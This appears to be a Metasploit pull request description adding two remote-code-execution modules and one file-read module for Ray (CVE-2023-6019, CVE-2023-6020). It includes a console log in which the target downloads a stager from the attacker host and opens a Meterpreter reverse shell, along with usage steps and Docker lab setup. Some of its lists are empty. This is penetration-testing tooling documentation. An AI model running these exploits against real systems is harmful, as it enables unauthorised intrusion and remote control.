msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set TARGET "Linux x64"
TARGET => Linux x64
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Grabbed node info, pid: 154, ip: 172.17.0.2
[*] Using URL: http://172.17.0.1:8080/afDM4TV
[*] Client 172.17.0.2 (Wget/1.20.3 (linux-gnu)) requested /afDM4TV
[*] Sending payload to 172.17.0.2 (Wget/1.20.3 (linux-gnu))
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (172.17.0.1:4444 -> 172.17.0.2:51120) at 2024-08-22 07:33:09 -0400
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.8.11-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Release Notes
This adds two exploit modules and one auxiliary module for Ray. The two exploit modules allow arbitrary commands to be executed remotely on the targeted system through command injection. The auxiliary module allows files on the remote system to be read through a local file inclusion vulnerability.
This PR should close #18584
Vulnerable Application
Ray (<=v2.6.3) is vulnerable to three vulnerabilities:
These modules exploit all three vulnerabilities.
The vulnerabilities affect:
This module was successfully tested on:
Install and run the vulnerable Ray (v2.6.3)
docker pull rayproject/ray:2.6.3
docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3
ray start --head --dashboard-host=0.0.0.0
Verification Steps
ray_cpu_profile_cmd_injection_cve_2023_6019
use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019
set rhost <rhost>
set lhost <attacker-ip>
run
ray_agent_job_rce
use exploit/linux/http/ray_agent_job_rce
set rhost <rhost>
set lhost <attacker-ip>
run
ray_lfi_cve_2023_6020
use auxiliary/gather/ray_lfi_cve_2023_6020
set rhost <rhost>
run